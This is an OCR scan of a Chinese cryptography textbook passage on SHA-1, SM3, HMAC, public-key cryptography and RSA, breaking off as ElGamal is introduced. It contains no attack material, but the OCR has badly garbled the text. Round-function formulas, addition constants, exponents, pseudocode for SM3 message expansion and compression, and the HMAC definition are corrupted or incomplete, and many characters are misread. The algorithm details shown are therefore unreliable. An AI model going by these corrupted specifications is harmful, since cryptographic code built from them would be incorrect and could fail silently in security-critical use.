A,B,C.D,E= 缓冲 区 的 5 个 字 
t = 步骤 编号 ，0<K79 


JB.C.D)= 第 t 步 使 用 的 基本 逻辑 函数 
<<<s ”=32 位 的 变量 循环 左 移 s 位 
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W: = 从 当前 分 组 导出 的 32 位 的 字 
Kt = 加 法 常量 
十 = 模 2” 加 法 


每 轮 使 用 一 个 逻辑 函数 ， 其 输入 均 为 三 个 32 位 的 字 ， 输 出 为 一 个 32 位 的 字 ， 它 们 
执行 位 逻辑 运算 ， 其 定义 见 表 2-10。 


表 2-10 各 轮 中 使 用 的 逻辑 函数 


函数 名 称 函 数 值 


O<t<19 A=f(B,C,D) (BaC)V(ABAD) 
20< f=f{B.C,D) BeCeD 
(BAOvCBAD)vCCAD) 


每 轮 使 用 一 个 加 法 常量 ， 第 t 步 使 用 的 加 法 常量 为 K:， 其 中 0<t<79。 其 定义 见 
表 2-11。 


R211 各 轮 中 使 用 的 加 法 常量 
步 又 编号 1 加 法 常量 K, (十 六 进 制 ) 
SFIBBCDC 
CAS2CIDS 


每 步 使 用 从 512 位 的 报 文 分 组 导出 的 一 个 32 位 的 字 。 因 为 共有 80 步 ， 所 以 要 将 16 
个 32 位 的 字 (Mo Mis) HEA 80 个 32 REM 至 Mro)。 其 扩展 过 程 为 : 

Wi= Mi: 若 O<t<15 

Wi= (W t169 Wina® Wis® Wr3)<<<1 若 16<1<79 

前 16 步 迭代 中 到 ,的 值 等 于 报 文 分 组 的 第 t 个 字 ， 其 余 64 步 迭 代 中 刺 , 等 于 前 面 4 
个 瑚 ; 值 异 或 后 循环 左 移 一 位 的 结果 。 而 循环 左 移 一 位 的 操作 也 正 是 SHA-1 相对 SHA-0 
的 唯一 一 处 改进 。SHA-1 将 报 文 分 组 的 16 个 字 扩 展 为 80 个 字 供 压缩 函数 使 用 ， 这 种 大 
量 元 余 使 被 压缩 的 报 文 分 组 相互 独立 ， 所 以 ， 对 给 定 的 报 文 ， 找 出 具有 相同 压缩 结果 的 
报 文 会 非常 复杂 。 

Chabaud 和 Joux 在 1998 年 发 现 一 种 能 用 2° 次 运算 来 发 现 SHA-0 中 的 碰撞 的 算法 ， 
但 不 适用 于 SHA-0 的 升级 版 本 SHA-1。Biham 等 在 2004 年 发 现 了 36 轮 SHA-1 的 碰撞 
和 45 轮 SHA-1 的 近似 碰撞 。 王 小 云 教授 在 2005 年 给 出 了 SHA-0 的 完全 碰撞 和 58 轮 
SHA-1 的 碰撞 ， 并 且 对 于 整个 SHA-1 的 碰撞 的 复杂 度 仅 为 2”，SHA-1 的 安全 性 由 此 也 


P 
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2.4.3 SM3 算法 


SM3 算法 是 国家 密码 管理 局 于 2010 年 的 安全 密码 杂凑 算法 。 其 基本 迭代 结构 采用 
了 增强 型 的 Merkle-Damgard 结构 ; 压缩 函数 包含 消息 扩展 和 压缩 主 函数 两 个 部 分 , 压缩 
主 函 数 采 用 了 非 对 称 Feistel 结构 。 
2.4.3.1 算法 迭代 结构 

SM3 算法 采用 了 典型 的 Merkle-Damgard i (04544, FRAI M-D 结构 ， 算 法 填充 方 
式 为 消息 末尾 添加 消息 长 度 ， 即 MLI102 LM), ， 其 中 M 是 消息 ，L(MWD 是 消息 的 长 度 
的 64 比特 二 进 制 表 示 ，(Z) 是 使 得 填充 后 消息 长 度 为 512 长 度 倍数 的 最 小 填充 “ 零 ” 
的 长 度 ， 这 种 填充 方式 的 M-D 结构 被 称 为 加 强 型 Merkle-Damgård 结构 。 该 结构 的 图 形 
描述 见 图 2-29。 


Bo BY Bere 
wv yr 一 ”Te 


图 2-29 Merkle-Damgard 结构 


2.43.2 ”算法 压缩 函数 结构 

SM3 算法 压缩 函数 结构 采用 了 典型 的 Davies-Meyer 模型 ， 即 E,V) OV 的 方式 , 其 
中 Es 是 一 个 置换 , WEAR ON Ep ,我 们 可 以 视 互 为 分 组 密码 算法 ,B 为 密 钥 , Davies-Meyer 
的 模型 如 图 2-30 所 示 。 


Je 一 | E i > æ pi> 


图 2-30 Davies-Meyer 模型 


2.4.3.3 ”算法 压缩 函数 
SM3 算法 压缩 函数 包含 消息 扩展 和 压缩 主 函 数 两 个 部 分 。 消 息 扩展 算法 的 描述 如 
图 2-31。 
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: 将 消息 划分 为 16 个 字 。 
7 : Forj=16 to 67 
W, + P, (W, -s BW (Ws <<<15)) ® (Ws <<< 7) OW; 


ENDFOR 
: Forj=0 to 63 


We WOW 4; 
ENDFOR 


图 2-31 消息 扩展 算法 伪 代 码 
SM3 算法 压缩 主 函 数 的 算法 描述 如 图 2-32 所 示 。 


第 一 步 :4BCDEFGHe 三 ”其 中 为 8 个 字 ， 为 链 变 量 ; 
第 二 步 : 
Forj=16to 63 
SS1 ~[(4<<<12)+E+(T<<<))] <<<7; 
SS2 二 SS1@(4 <<<12); 
TTI —[FF(A,B,C)+D+S882]+W); 
TT2 —[GG(E,F.G)+H+SS) + W; 
D C; 
CB <<<9; 
Bea; 
A<—TT1; 
H<-G; 
GeF <<<19; 
Fee; 
E — PATT), 
ENDFOR 
第 三 步 : V“ —ABCDEFGH ® V” 


图 2-32 压缩 主 函数 伪 代 码 
算法 中 涉及 的 函数 说 明 如 图 2-33 所 示 。 


A®BOC 0<j<15 


FF{A,B,C) = 
AO E 16< j < 63 


GGIEFG) = E®F®G o<j<is 
(E a F)v (AE AG) 16 < j < 63 


P(X) =X O(X <<<9)8(X <<<17) 
P(X) =X ®(X <<<15)® (X <<< 23) 
也: 常数 


图 2-33 其 他 函数 与 置换 


Pa 
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2.4.4 HMAC 


2441 消息 完整 性 

完整 性 指数 据 正 确 无 误 、 完 整 不 缺 ， 使 数据 免 受 未 授权 的 毁坏 ， 就 是 确保 数据 的 完 
整 性 。 报 文 内 容 认 证 使 接收 方 能 够 确认 报 文 内 容 的 真实 性 和 完整 性 ， 这 可 通过 验证 认证 
{4 (Authentication Code) 的 正确 性 来 实现 。 
2.4.4.2 ”消息 认证 码 

消息 认证 码 MAC (Message Authentication Code) 是 消息 内 容 和 秘密 钥 的 公开 函数 ， 
其 输出 是 固定 长 度 的 短 数据 块 : 

MAC=C(M, K) (2-38) 

假定 通信 双方 共享 秘密 钥 K。 若 发 送 方 A 向 接收 方 B 发 送 报 文 M, 则 A 计算 MAC 

并 将 报 文 M 和 MAC 发 送 给 接收 方 : 
A-»B: MIMAC 

接收 方 收 到 报 文 后 用 相同 的 秘密 钥 K 进行 相同 的 计算 得 出 新 的 MAC， 并 将 其 与 接 
收 到 的 MAC 进行 比较 ， 若 二 者 相等 ， 则 

(1) 接收 方 可 以 相信 报 文 未 被 修改 。 如 果 攻 击 者 改变 了 报 文 ， 因 为 已 假定 攻击 者 不 
知道 秘密 钥 ， 所 以 他 不 知道 如 何 对 MAC 作 相应 修改 。 这 将 使 接收 方 计算 出 的 MAC 将 
不 等 于 接收 到 的 MAC。 

(2) 接收 方 可 以 相信 报 文 来 自 意 定 的 发 送 方 。 因 为 其 他 各 方 均 不 知道 秘密 钥 ， 因 此 
他 们 不 能 产生 具有 正确 MAC 的 报 文 。 
2.4.4.3 ”使 用 HMAC 的 消息 认证 码 

对 于 消息 的 完整 性 的 保护 ， 我 们 可 以 通过 使 用 类 似 分 组 密码 的 密 文 链接 (CBC) 模 
式 来 计算 消息 认证 码 MAC。 因 为 hash 函数 满足 输入 改变 输出 结果 就 不 同 的 特性 ， 所 以 
我 们 也 能 够 使 用 hash 来 验证 消息 的 完整 性 。 但 是 我 们 不 能 直接 发 送 消 息 M 和 它 的 hash 
值 h(M)， 因 为 攻击 者 可 以 轻易 地 把 M 换 成 M'， 把 h(M) 换 成 h(M') 。 然 而 如 果 我 们 根 
据 对 称 密 钥 进行 hash 计算 ， 我 们 就 能 够 计算 基于 hash 函数 的 消息 认证 码 MAC， 即 
HMAC。 与 基于 分 组 密码 的 MAC 算法 相 比 ，HMAC 软件 执行 速度 更 快 。 
2.4.4.4 HMAC 算法 

图 2-34 给 出 了 HMAC 的 总 体 结构 。 定 义 下 列 符号 : 

。 A= KATY hash 函数 Cl MDS, SHA-1 等 算法 ) 

。 T= 作为 hash 函数 输入 的 初始 值 

e M=HMAC 的 消息 输入 (包括 由 嵌入 hash 函数 定义 的 填充 位 ) 
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Y=M 的 第 i 个 分 组 ，0<i<(L-1) 
L=M 中 的 分 组 数 
5= 每 一 分 组 所 含 的 位 数 
n= IRAK hash 函数 所 产生 的 hash 码 长 
K= 密 钥 ,建议 密 钥 长 度 zn; 若 密 钥 长 度 大 于 5， 则 将 密 钥 作为 hash 函数 的 输入 ， 
来 产生 一 个 n 位 的 密 钥 
及 = 在 天 左边 填充 0 后 形成 标准 块 ， 所 得 的 b 位 结果 
ipad= 00110110〈 十 六 进 制 数 36) 重复 b/8 次 的 结果 
opad= 01011100 (+-7\ HEIR SC) 重复 b/8 次 的 结果 
HMAC 可 描述 如 下 : 

HMACK= HI(K Dopad) || HI(K Bipad) || MI] 


也 就 是 说 ， 
(1) EK 左边 填充 0， 得 到 b 位 的 KR( 例 如， 车 下 是 160 位 ，b=512， 则 在 天 中 加 
入 4 个 字 节 的 0x00); 


(2) K5 ipad 执行 异 或 运算 (位 异 或 ) 产生 b 位 的 分 组 Si 

(3) 将 M 附 于 Si 后 ; 

(4) 将 五 作用 于 步骤 3 所 得 出 的 结果 ; 

(5) KK 与 opad 执行 异 或 运算 (位 异 或 ) 产 生 b 位 的 分 组 Sos 

(6) 将 步骤 4 中 的 hash 码 附 于 So 后 ; 

(7) Hi HEATHER 6 所 得 出 的 结果 ， 并 输出 该 函数 值 。 

注意 : K 与 ipad 异 或 后 ， 其 信息 位 有 一 半 发 生 了 变化 ， 同样， 天 与 opad 异 或 后 ， 
其 信息 位 的 另 一 半 也 发 生 了 变化 ， 这 样 ， 通 过 将 $ 与 So 传 给 hash 算法 中 的 压缩 函数 ， 
我 们 可 以 从 天 伪 随 机 地 产生 出 两 个 密 钥 。 

HMAC 多 执行 了 三 次 hash 压缩 函数 (对 S%、So 和 内 部 的 hash 产生 的 分 组 )， 但 是 对 
于 长 消息 ，HMAC 和 嵌入 的 hash 函数 的 执行 时 间 应 该 大 致 相同 。 

实现 HMAC 有 更 为 有 效 的 方法 ， 如 图 2-34 所 示 。 我 们 可 以 预计 算 两 个 值 : 

SUV. (K @ipad)) 
SUV. (K @opad)) 

其 中 fev,block) 是 hash 函数 的 压缩 函数 , 其 输入 是 n 位 的 链接 变量 cv 和 5b 位 的 分 组 
block, 输出 是 n 位 的 链接 变量 上述 这 些 值 只 在 初始 化 或 密 钥 改变 时 才 需 计算 , 实际 上 ， 
这 些 预 先 计算 的 值 取代 了 hash 函数 中 的 初 值 47)。 这 样 ， 只 多 执行 了 一 次 压缩 函数 ， 在 
大 多 数 产生 MAC 的 消息 都 较 短 的 情况 下 ， 这 种 实现 特别 有 意义 。 
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图 2-34 HMAC 的 结构 


2.5 公 钥 密码 体制 


2.51 公 旬 密码 体制 的 概念 


利用 传统 密码 进行 保密 通信 ， 通 信 的 双方 必须 首先 预约 持 有 相同 的 密 钥 才能 进行 。 
而 私人 和 商业 之 间 想 通过 通信 工具 洽谈 生意 又 要 保持 商业 秘密 ， 有 时 很 难 做 到 事先 预约 
密 钥 。 另外， 对 于 大 型 计算 机 网 络 , A n 个 用 户 ,任意 两 个 用 户 之 间 都 可 能 进行 通信 和， 
共有 中 取 2=n(n-1)/2 种 不 同 的 通信 方式 ， 当 n 较 大 时 这 一 数目 是 很 大 的 。 从 安全 角度 
考虑 ， 为 了 安全 ， 密 钥 应 当 经 常 更 换 。 在 网 络 上 产生 、 存 储 、 分 配 、 管 理 如 此 大 量 的 密 
钥 ， 其 复杂 性 和 危险 性 都 是 很 大 的 。 
因此 ， 密 钥 管理 上 的 困难 是 传统 密码 应 用 的 主要 障碍 。 这 种 困难 在 计算 机 网 络 环境 
下 更 显得 突出 。 另 外 ， 传 统 密码 不 易 实现 数字 签名 ， 也 限制 了 它 的 应 用 范围 。 

为 此 , 人 们 希望 能 设计 一 种 新 的 密码 , 从 根本 上 克服 传统 密码 在 密 钥 管理 上 的 困难 ， 
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而 且 容 易 实 现 数字 签名 ， 从 而 适合 计算 机 网 络 环境 的 应 用 ， 适 合 各 种 需要 数字 签名 的 
应 用 。 

1976 年 美国 斯 坦 福 大 学 的 博士 生 W.Diffie 和 他 的 导师 M.Hellman 教授 发 表 了 “密码 
学 新 方向 ”的 论文 ， 第 一 次 提出 公开 密 钥 密 码 的 概念 。 从 此 开创 了 一 个 密码 新 时 代 。 
2.5.1.1 单 向 陷 门 函数 

设 函 数 y=fx)， 如 果 满 足以 下 两 个 条 件 ， 则 称 为 单 向 函数 : 

(1) 如 果 对 于 给 定 的 x， 要 计算 出 很 容易 ; 

(2) 而 对 于 给 定 的 y， 要 计算 出 x 很 难 。 

如 上 章 介绍 的 安全 HASH 函数 就 属于 典型 的 单 向 函数 , 单 向 函数 常用 于 保护 操作 系 
统 口令 等 应 用 。 如 果 利 用 单 向 函数 构造 密码 : 用 正 变换 作 加 密 ， 加 密 效 率 高 ， 用 逆 变 换 
作 和 解密， 安全， 敌手 不 可 破译 ， 但 是 加 密 后 不 能 还 原 。 为 此 引入 单 向 陷 门 函 数 的 概念 。 

单 向 陷 门 函数 : 设 函 数 y=fx)， 且 f 具 有 陷 门 ， 如 果 满 足以 下 两 个 条 件 ， 则 称 为 单 向 
陷 门 函数 : 

CL) 如 果 对 于 给 定 的 x， 要 计算 出 y 很 容易 ; 

(2) 而 对 于 给 定 的 y， 如 果 不 掌握 陷 门 要 计算 出 x 很 难 ， 而 如 果 掌 握 陷 门 要 计算 出 x 
就 很 容易 。 

如 果 利 用 单 向 陷 门 函数 构造 密码 : 用 正 变换 作 加 密 ， 加密 效率 高 ; 用 逆 变 换 作 解 密 ， 
安全 ; 把 陷 门 信息 作为 密 钥 ， 且 只 分 配给 合法 用 户 。 确 保 合 法 用 户 能 够 方便 地 解密 ， 而 
非法 用 户 不 能 破译 。 

理论 上 不 能 证 明 单 向 函数 一 定 存在 ， 但 实际 上 只 要 函数 的 单 向 性 足够 工程 应 用 就 
行 。 实 际 上 已 找到 的 单 向 性 足够 的 函数 有 : 

CD) 合 数 的 因子 分 解 问题 ， 大 素数 的 乘积 容易 计算 (pxq 二 n)， 而 大 合 数 的 因子 分 
解困 难 (n => pxq)。 

(2) 有 限 域 上 的 离散 对 数 问题 : 有 限 域 上 大 素数 的 寡 乘 容易 计算 (a? 一 c)， 而 对 数 
计算 困难 (log a c > b)。 
2.5.1.2” 公 钥 加 密 模型 

根据 公开 密 钥 密码 的 基本 思想 ， 可 知 一 个 公开 密 钥 密码 应 当 满 足以 下 三 个 条 件 ; 

(1) 解密 算法 DD 与 加 密 算法 互 逆 ， 即 对 于 所 有 明文 M 都 有 : 

D (E (M, Ke) , Ka) =M (2-39) 

(2) 在 计算 上 不 能 由 Ks 求 出 Kao 

(3) 算法 E 和 DD 都 是 高 效 的 。 

条 件 (1) 是 构成 密码 的 基本 条 件 ， 是 传统 密码 和 公开 密 钥 密码 都 必须 具备 的 起 码 
条 件 。 

条 件 (2) 是 公开 密 钥 密码 的 安全 条 件 ， 是 公开 密 钥 密码 的 安全 基础 。 而 且 这 一 条 
件 是 最 难 满足 的 。 由 于 数学 水 平 的 限制 ， 目 前 尚 不 能 从 数学 上 证 明 一 个 公开 密 钥 密 码 完 
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全 满足 这 一 条 件 ， 而 只 能 证 明 它 不 满足 这 一 条 件 。 这 就 是 困难 的 根本 原因 。 
条 件 (3) 是 公开 密 钥 密码 的 实用 条 件 。 因 为 只 有 算法 E 和 DD 都 是 高 效 的 ， 密 码 才 
实际 应 用 。 否 则 ， 可 能 只 有 理论 意义 ， 而 不 能 实际 应 用 。 
满足 了 以 上 三 个 条 件 ， 便 可 构成 一 个 公开 密 钥 密码 ， 这 个 密码 可 以 确保 数据 的 秘 
密 性 。 
进而 ， 如 果 还 要 求 确保 数据 的 真实 性 ， 则 还 应 满足 第 四 个 条 件 。 
(4) 对 于 所 有 明文 M 都 有 
E (D (M, Ka) , Ke) =M (2-40) 
条 件 (4) 是 公开 密 钥 密 码 能 够 确保 数据 真实 性 的 基本 条 件 。 如 果 满 足 了 条 件 (1)、 
(2)、(4)， 同 样 可 构成 一 个 公开 密 钥 密 码 ， 这 个 密码 可 以 确保 数据 的 真实 性 。 注 意 条 件 
(4) 是 公开 密 钥 密码 能 够 确保 数据 真实 性 的 一 个 充分 条 件 ， 不 是 必要 条 件 。 
如 果 同 时 满足 以 上 4 个 条 件 , 则 公开 密 钥 密码 可 以 同时 确保 数据 的 秘密 性 和 真实 性 。 
此 时 ， 对 于 所 有 的 明文 M 都 有 : 
D (E (M, Ke) ,Ka) =E (D (M, Ka) ,Ke) =M (2-41) 
自从 1976 年 W.Diffie 和 M.Hellman 教授 提出 公开 密 钥 密 码 的 新 概念 后 。 由 于 公开 
密 钥 密码 具有 优良 的 密码 学 特性 和 广阔 的 应 用 前 景 ,很 快 便 吸 引 了 全 世界 的 密码 爱好 者 ， 
他 们 提出 了 各 种 各 样 的 公开 密 钥 密码 算法 和 应 用 方案 ， 密 码 学 进入 了 一 个 空前 繁荣 的 阶 
段 。 然 而 公开 密 钥 密码 的 研究 确 非 易 事 ， 尽 管 提出 的 算法 很 多 ， 但 是 能 经 得 起 时 间 考 验 
的 却 灾 窗 无几。 经 过 二 十 几 年 的 研究 和 发 展 ， 目 前 公开 密 钥 密码 已 经 得 到 广泛 的 应 用 。 
目前 世界 公认 的 比较 安全 的 公开 密 钥 密 码 有 基于 大 合 数 因子 分 解困 难 性 的 RAS 密 
码 类 和 基于 离散 对 数 问题 困难 性 的 ElGamal 密码 类 (包括 椭圆 曲线 密码 )。 
2.5.1.3 ” 公 钥 与 私 钥 
公开 密 钥 密 码 的 基本 思想 是 将 传统 密码 的 密 钥 K 一 分 为 二 ， 分 为 加 密 钥 Ke 和 解密 
钥 Ka MOEH KK。 控制 加 密 ， 用 解密 钥 Ka 控制 解密 ， 而 且 由 计算 复杂 性 确保 由 加 密 钥 
KK 在 计算 上 不 能 推出 解密 钥 Ka。 这 样 ， 即 使 是 将 Ks 公开 也 不 会 暴露 Kx， 也 不 会 损害 密 
码 的 安全 。 于 是 便 可 将 Ke 公开 ， 而 只 对 Ka 保密 。 由 于 瑟 是 公开 的 ， 只 有 Ka 是 保密 的 ， 
所 以 便 从 根本 上 克服 了 传统 密码 在 密 钥 分 配 上 的 困难 。 
公开 密 钥 密码 从 根本 上 克服 了 传统 密码 在 密 钥 分 配 上 的 困难 ， 利 用 公开 密 钥 密码 进 
行 保密 通信 和 需要 成 立 一 个 密 钥 管理 中 心 KMC (Key Management Center)， 每 个 用 户 都 将 
自己 的 姓名 、 地 址 和 公开 的 加 密 钥 等 信息 在 KMC 登记 注册 ， 将 公 和 钥 记 入 共享 的 公 钥 数 
据 库 PKDB(Public Key Database)。KMC 负责 密 钥 的 管理 ， 并 且 对 用 户 是 可 信赖 的 。 这 
样 ， 用 户 利用 公开 密 钥 密码 进行 保密 通信 就 像 查 电话 号 码 秒 打 电 话 一 样 方便 ， 青 无 通信 
双方 预约 密 钥 之 苦 ， 因 此 特别 适合 计算 机 网 络 应 用 。 加 上 公开 密 钥 密码 实现 数字 签名 容 
易 ， 所 以 特别 受到 欢迎 。 
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2.5.1.4 AMBRE 


BWM 为 明文 ，C 为 密 文 , E 为 公开 密 钥 密码 的 加 密 算法 ，D 为 解密 算法 ，K 为 公开 


的 加 密 钥 ，Ka 为 保密 的 解密 钥 ， 每 个 用 户 都 分 配 一 对 密 钥 ， 而 且 将 所 有 用 户 的 公开 的 加 
密 钥 Ke 存 入 共享 的 密 钥 库 PKDB。 


HeH 
M, 


再 设 用 户 A 要 把 数据 M 安全 保密 地 传送 给 用 户 B, RNE EA FERRE N: 
1. 确保 数据 的 秘密 性 
发 方 : 
© A 首先 查 PKDB， 查 到 B 的 公开 的 加 密 钥 Ke o 
© A 用 Kes 加 密 M 得 到 密 文 C: 
C=E (M, Kes) 


@ A 发 C 给 B。 

收 方 : 

®© B 接受 C。 

© B 用 自己 的 保密 的 解密 钥 Kas 解密 C， 得 到 明文 M=D (C, Kae). 

由 于 只 有 用 户 B 才 拥有 保密 的 解密 钥 Kas， 而 且 由 公开 的 加 密 钥 Kes 在 计算 上 不 能 
1 保密 的 解密 钥 Kas， 所 以 只 有 用 户 B 才能 获得 明文 M， 其 他 任何 人 都 不 能 获得 明文 
从 而 确保 了 数据 的 秘密 性 。 

然而 这 一 通信 协议 却 不 能 确保 数据 的 真实 性 。 这 是 因为 PKDB 是 共享 的 , 任何 人 都 


可 以 查 到 B 的 公开 的 加 密 钥 Kes, 因此 任何 人 都 可 以 冒充 A 通过 发 假 密 文 CEC M', Ke), 
来 发 假 数据 M' 给 B， 而 B 不 能 发 现 。 


HEH 


为 了 确保 数据 的 真实 性 ， 可 采用 下 面 的 通信 协议 。 
2， 确保 数据 的 真实 性 


发 方 : 

O A 首先 用 自己 的 保密 的 解密 钥 Ka 解密 M， 得 到 密 文 C: 
C=D M, Kaa). 

@ A 发 C 给 B。 

收 方 : 

O B 接受 C。 


@ B Æ PKDB, 查 到 A 的 公开 的 加 密 钥 Kaso 

© 用 Kes 加 密 C 得 到 M=E (C, Ka) 

由 于 只 有 用 户 A 才 拥 有 保密 的 解密 钥 Ku， 而 且 由 公开 的 加 密 钥 Ka 在 计算 上 不 能 
保密 的 解密 钥 Kaa， 所 以 只 有 用 户 4 才能 发 送 数 据 M。 其 他 任何 人 都 不 能 冒充 4 发 


送 数据 M， 从 而 确保 了 数据 的 真实 性 。 


然而 这 一 通信 协议 却 不 能 确保 数据 的 秘密 性 。 这 是 因为 PKDB 是 共享 的 ,任何 人 都 


可 以 查 到 A 的 公开 的 加 密 钥 Kes， 因 此 任何 人 都 可 以 获得 数据 M。 
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为 了 同时 确保 数据 的 秘密 性 和 真实 性 ， 可 将 以 上 两 个 协议 结合 起 来 ， 采 用 下 面 的 通 


信 协 议 。 
3 同时 确保 数据 的 秘密 性 和 真实 性 
发 方 : 
O A 首先 用 自己 的 保密 的 解密 钥 Ka 解密 M， 得 到 中 间 密 文 5: 


S=D (M，Kaa)。 

© 然后 A 查 PKDB， 查 到 B 的 公开 的 加 密 钥 Kes o 

@ A 用 Kes 加密 S 得 到 最 终 的 密 文 C: 

ČE (S Raa) 

@ A 发 C 给 B。 

收 方 : 

O B 接 受 C。 

© B 用 自己 的 保密 的 解密 钥 Kas 解密 C， 得 到 中 间 密 文 S=D (C, Kap) 

@ B 查 PKDB， 查 到 A 的 公开 的 加 密 钥 Kea 。 用 Kes 加 密 S 得 到 M=E (S, Kes)o 

由 于 这 一 通信 协议 综合 利用 了 上 述 两 个 通信 协议 ， 所 以 能 够 同时 确保 数据 的 秘密 性 
和 真实 性 。 具体 地 ， 由 于 只 有 用 户 4 才 拥有 保密 的 解密 钥 Ke， 而 且 由 公开 的 加 密 钥 Kea 
在 计算 上 不 能 推出 保密 的 解密 钥 Kao 所 以 只 有 用 户 4 才能 正确 进行 发 方 的 第 @ 步 操作 ， 
才能 发 送 数据 M。 其 他 任何 人 都 不 能 冒充 A 发 送 数 据 M， 从 而 确保 了 数据 的 真实 性 。 又 
由 于 只 有 用 户 B 才 拥有 保密 的 解密 钥 Kas， 而 且 由 公开 的 加 密 钥 Kes 在 计算 上 不 能 推出 
保密 的 解密 钥 Kas, 所 以 只 有 用 户 B 才能 正确 进行 收 方 的 第 @ 步 操作 , 才能 获得 明文 M， 
其 他 任何 人 都 不 能 获得 明文 M， 从 而 确保 了 数据 的 秘密 性 。 


2.5.2 RSA 密码 


1978 年 美国 麻 省 理工 学 院 的 三 名 密码 学 者 R.L.RivesbA.Shamir fil L.Adleman 提出 了 
一 种 基于 大 合 数 因子 分 解困 难 性 的 公开 密 钥 密码 ， 简 称 为 RSA 密码 。 由 于 RSA 密码 ， 
既 可 用 于 加 密 ， 又 可 用 于 数字 签名 ， 安 全 、 易 懂 ， 因 此 RSA 密码 已 成 为 目前 应 用 最 广泛 
的 公开 密 钥 密码 。 许多 国家 标准 化 组 织 , W ISO, ITU, SWIFT 和 TCG 等 都 已 接收 RSA 
作为 标准 。INTERNET 网 的 Email 保密 系统 GPG 以 及 国际 VISA All MASTER 组 织 的 电 
子 商务 协议 (SET 协议 ) 中 都 将 RSA 密码 作为 传送 会 话 密 钥 和 数字 签名 的 标准 。 
2.5.2.1 基本 的 RSA 密码 体制 : 参数 、 加 密 算法 、 解 密 算 法 

© 随机 地 选择 两 个 大 素数 p 和 gq， 而 且 保 密 ; 

© 计算 n=pg， 将 n AR: 

© 计算 g(n)=(-1)(q-1)， 对 oes: 

© 随机 地 选取 一 个 正 整 数 e，1<e<g(n) 晶 (e，g(n)) =1, Hee 公开; 

© 根据 ed=1 mod g(n), KH d, FX} d RE: 
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© 加 密 运算 : 

C=M mod n (2-42) 

@ 解密 运算 : 

MC mod n (2-43) 

由 以 上 算法 可 知 ，RSA 密码 的 公开 加 密 钥 Ke=<n,e>， 而 保密 的 解密 钥 Kz =<p,q,q,， 
p(n)>。 

说 明 : 算法 中 的 g(n) 是 一 个 数论 函数 ， 称 为 欧 拉 〈Euler) 函数 。g(n) 表 示 在 比 n 小 
的 正 整 数 中 与 n 互 素 的 数 的 个 数 。 例 如 ，g(6)=2， 因 为 在 1，2，3，4，5 中 与 6 互 素 的 
ARA 1 和 5 两 个 数 。 若 p 和 g 为 素数 ， 且 n=pq， 则 omn (p-1) (gq-1)。 

例 2-2 4 p=47，g=71，n=47x71=3337，g(n)= 9(3337)=46x70=3220。 选 取 e=79, 
计算 d=e mod 3220 =1019 mod 3220。 公 开 e=79 和 n=3337， 保 密 p=47，g=71，d=1019 
和 pg(n)=3220。 

设 明 文 M=688 232 687 966 668 3, YETA, M\=688, M:=232, M;=687, M,=966, 
Ms=668, M003. My 的 密 文 C\=688” mod 3337=1570， 继 续 进行 类 似 计 算 ， 可 得 最 终 
密 文 

C=1570 2756 2091 2276 2423 158. 

如 若 解密 ， 计 算 My =1570'° mod 3337=688， 类 似 地 可 解密 还 原 出 其 他 明文 。 
2.5.2.2 RSA 密码 体制 的 特点 

RSA 算法 具有 加 解密 算法 的 可 逆 性 ， 加 密 和 解密 运算 可 交换 ， 可 同时 确保 数据 的 秘 
密 性 和 数据 的 真实 性 。 由 于 RSA 密码 的 核心 运算 是 模 寡 运算 , 其 实现 效率 是 比较 高 效 的 。 

关于 在 计算 上 由 公开 密 钥 不 能 求 出 解密 钥 的 问题 ， 请 参考 下 一 小 节 。 
2.5.2.3 RSA 密码 的 安全 性 

小 合 数 的 因子 分 解 是 容易 的 ， 然 而 大 合 数 的 因子 分 解 却 是 十 分 困难 的 。 关 于 大 合 
的 因子 分 解 的 时 间 复 杂 度 下 限 目 前 尚 没 有 一 般 的 结果 ， 迄 今 为 止 的 各 种 因子 分 解 算法 提 
示人 们 这 一 时 间 下 限 将 不 低 于 O (EXP (lnNlnInN) ””)。 根 据 这 一 结论 ， 只 要 合 数 足够 
大 ， 进 行 因子 分 解 是 相当 困难 的 。 因 此 , 今天 要 应 用 RSA 密码 ， 应 当 采 用 足够 大 的 整数 
n。 普 遍 认为 ，n 至 少 应 取 1024 位 ， 最 好 取 2048 fir. 

除了 通过 因子 分 解 攻击 RSA 外 ， 还 有 一 些 其 他 的 攻击 方法 ， 但 是 都 还 不 能 对 RSA 
构成 有 效 威胁 。 因 此 完全 可 以 认为 ， 只 要 合理 地 选择 参数 ， 正 确 地 使 用 ，RSA 就 是 安全 
的 。 为 了 确保 RSA 密码 的 安全 ， 必 须 认真 选择 RSA 的 密码 参数 : p 和 g 要 足够 大 并 且 疡 
All q 应 为 强 素数 (Strong Prime)。 例 如 , 国际 可 信 计 算 组 织 TCG (Trusted Computing Group) 
在 可 信 计 算 标准 中 规定 : 一 般 加 密 密 钥 和 认证 密 钥 选 n 为 1024 位 , 而 平台 根 密 钥 和 存储 
根 密 钥 则 选 n 为 2048 位 。 此 外 ， 还 要 注意 以 下 参数 的 选择 : 


ky 项 


Ea 
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(1) e 的 选择 

为 了 使 加 密 速 度 快 ， 根 据 “ 反 复 平 方 乘 ” 算 法 ，e 的 二 进 制 表示 中 应 当 含有 尽量 少 
的 1。 一 种 办 法 是 选择 尽 可 能 小 的 e， 或 选择 某 些 特殊 的 e。 

曾经 有 学 者 建议 取 e=3， 但 这 是 不 安全 的 。 这 是 因为 ， 若 e 太 小 ， 对 于 小 的 明文 M, 
WA C=M “<n， 加 密 运 算 未 取 模 。 于 是 直接 对 密 文 C 开 e 次 方 ， 便 可 求 出 明文 M。 

于 是 有 的 学 者 建议 取 e=2"“+1=65537， 其 二 进 制 表 示 中 只 有 两 1， 加 密 速度 快 , 而 且 
比 e=3 更 安全 。 这 一 建议 目前 得 到 普遍 采纳 。 

(2) d 的 选择 

与 e 的 选择 类 似 ， 为 了 使 解密 速度 快 ， 希 望 选用 小 的 4， 但 是 d 太 小 也 是 不 好 的 。 
当 q 小 于 n 的 14 时 ， 已 有 求 出 d 的 攻击 方法 。 

(3) 不 要 许多 用 户 共 用 一 个 模 数 n 

许多 用 户 共用 一 个 相同 的 模 数 n, 各 自选 用 不 同 的 e 和 q, 这 样 实现 简单 , 但 不 安全 。 


2.5.3 ElGamal 密码 


ElGamal 密码 是 除了 RSA 密码 之 外 最 有 代表 性 的 公开 密 钥 密码 。RSA 密码 建立 在 大 
整数 因子 分 解 的 困难 性 之 上 ， 而 ElGamal 密码 建立 在 离散 对 数 的 困难 性 之 上 。 大 整数 的 
因子 分 解 和 离散 对 数 问题 是 目前 公认 的 较 好 的 单 向 函数 ， 因 而 RSA 密码 和 ElGamal 密 
码 是 目前 公认 的 安全 的 公开 密 钥 密码 。 本 节 介 绍 ElGamal 密码 。 
